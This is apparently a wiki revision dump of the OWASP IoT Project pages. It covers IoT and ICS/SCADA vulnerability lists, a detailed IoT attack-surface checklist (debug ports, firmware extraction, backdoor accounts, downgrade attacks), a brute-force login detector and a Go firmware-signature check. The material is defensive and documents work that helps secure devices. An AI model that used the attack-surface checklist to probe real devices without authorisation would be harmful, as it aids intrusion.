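{"ts": 1007, "event": "peer", "device_id": "dev-0001"}
{"ts": 1008, "event": "peer", "device_id": "dev-0009"}
{"ts": 1009, "event": "peer", "device_id": "dev-4242"}
""" + "".join(
    json.dumps({"ts": 2000 + i, "event": "login", "src": "203.0.113.9",
                "user": f"user{i}", "result": "fail"}) + "\n"
    for i in range(RATE_THRESHOLD)
)


def run_demo() -> list:
    """Run the detector over SAMPLE_LOG and return the emitted events."""
    return list(detect(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for ts, name, detail in run_demo():
        print(ts, name, "-", detail)
```
<br />
The burst from 203.0.113.9 trips only the rate rule, because each attempt names a different user, while the three failures for admin trip the per-user rule without reaching the rate threshold; the two rules are kept separate for that reason.<br />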
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Event Logging Project? ==<br />
<br />
The IoT Event Logging Project provides a list of core events that should be logged by any IoT-related system. The project exists because IoT systems generally log far too few events to feed a solid detection and response program, and organizations that want to build one have few good references for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses, ranked and mapped to CWE identifiers, are as follows (note that several entries, such as CWE-264, CWE-255, CWE-399 and CWE-189, are CWE categories rather than individual weaknesses):<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization, supported by over 100 organizations, headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246185OWASP Internet of Things Project2018-12-19T23:54:08Z<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
Vishruta Rudresh<br />
<br />
Vijayamurugan Pushpanathan <br />
<br />
Aaron Guzman <br />
<br />
Alexander Lafrenz <br />
<br />
Masahiro Murashima <br />
<br />
Charlie Worrell <br />
<br />
José A. Rivas (jarv) <br />
<br />
Pablo Endres <br />
<br />
Ade Yoseman <br />
<br />
Cédric LEVY-BENCHETON<br />
<br />
Jason Andress<br />
<br />
Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known vulnerabilities that come with them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
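The Update Mechanism and Device Firmware rows above list unsigned updates, missing update verification, malicious updates and firmware downgrade as attack surfaces. The following Go program is an added example, not code from the OWASP project or from any vendor's update client: it shows the checks a device should run before flashing an image, in the order a defender wants them, namely signature first, then image hash, then a version check that refuses downgrades. The manifest format, its field names and a vendor public key provisioned at manufacture are assumptions made for this example; transport encryption, which the table lists as a separate item, is not replaced by signing and is not shown here.<br />

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is the signed description of an update. Its shape and field names
// are constructed for this example, not any vendor's or OWASP's format.
type Manifest struct {
	Version   uint32 // must increase monotonically across releases
	ImageHash string // hex SHA-256 of the firmware image bytes
}

// encode gives the canonical bytes that are signed and later verified; signer
// and verifier must agree on it exactly.
func (m Manifest) encode() []byte {
	return []byte(fmt.Sprintf("v=%d;sha256=%s", m.Version, m.ImageHash))
}

// Device holds what the device side needs: the vendor's public key (assumed to
// be provisioned at manufacture) and the version currently running.
type Device struct {
	VendorPub      ed25519.PublicKey
	RunningVersion uint32
}

var (
	ErrBadSignature = errors.New("manifest signature missing or invalid")
	ErrHashMismatch = errors.New("image hash does not match the signed manifest")
	ErrDowngrade    = errors.New("update is not newer than the running firmware")
)

// VerifyUpdate runs before anything is flashed. The signature is checked first so
// that no field of the manifest is trusted until its origin is established; the
// version check then closes the firmware-downgrade surface.
func (d *Device) VerifyUpdate(m Manifest, sig, image []byte) error {
	if !ed25519.Verify(d.VendorPub, m.encode(), sig) {
		return ErrBadSignature
	}
	sum := sha256.Sum256(image)
	if hex.EncodeToString(sum[:]) != m.ImageHash {
		return ErrHashMismatch
	}
	if m.Version <= d.RunningVersion {
		return ErrDowngrade
	}
	return nil
}

// SignUpdate is the vendor side: hash the image, build the manifest, sign it.
func SignUpdate(priv ed25519.PrivateKey, version uint32, image []byte) (Manifest, []byte) {
	sum := sha256.Sum256(image)
	m := Manifest{Version: version, ImageHash: hex.EncodeToString(sum[:])}
	return m, ed25519.Sign(priv, m.encode())
}

// Scenario exercises the checks with a constructed key pair and image, returning
// the outcome of each case so it can be inspected or asserted on.
func Scenario() map[string]error {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	dev := &Device{VendorPub: pub, RunningVersion: 5}
	image := []byte("constructed firmware image v6")
	m, sig := SignUpdate(priv, 6, image)

	out := map[string]error{}
	out["valid"] = dev.VerifyUpdate(m, sig, image)
	out["unsigned"] = dev.VerifyUpdate(m, nil, image)
	tampered := append([]byte(nil), image...)
	tampered[0] ^= 0xff
	out["tampered_image"] = dev.VerifyUpdate(m, sig, tampered)
	forged := m // manifest altered after signing, e.g. to bump the version
	forged.Version = 99
	out["edited_manifest"] = dev.VerifyUpdate(forged, sig, image)
	old := []byte("constructed firmware image v4") // correctly signed but older
	oldM, oldSig := SignUpdate(priv, 4, old)
	out["downgrade"] = dev.VerifyUpdate(oldM, oldSig, old)
	return out
}

func main() {
	for name, err := range Scenario() {
		fmt.Printf("%-16s -> %v\n", name, err)
	}
}
```

Running it prints the outcome for a valid update and for four rejected cases: unsigned, tampered image, manifest edited after signing, and a correctly signed but older image. The manifest rather than the raw image is signed so that the version number travels under the signature; hashing the image and signing only the manifest also keeps the public-key operation cheap on a constrained device.<br />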
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
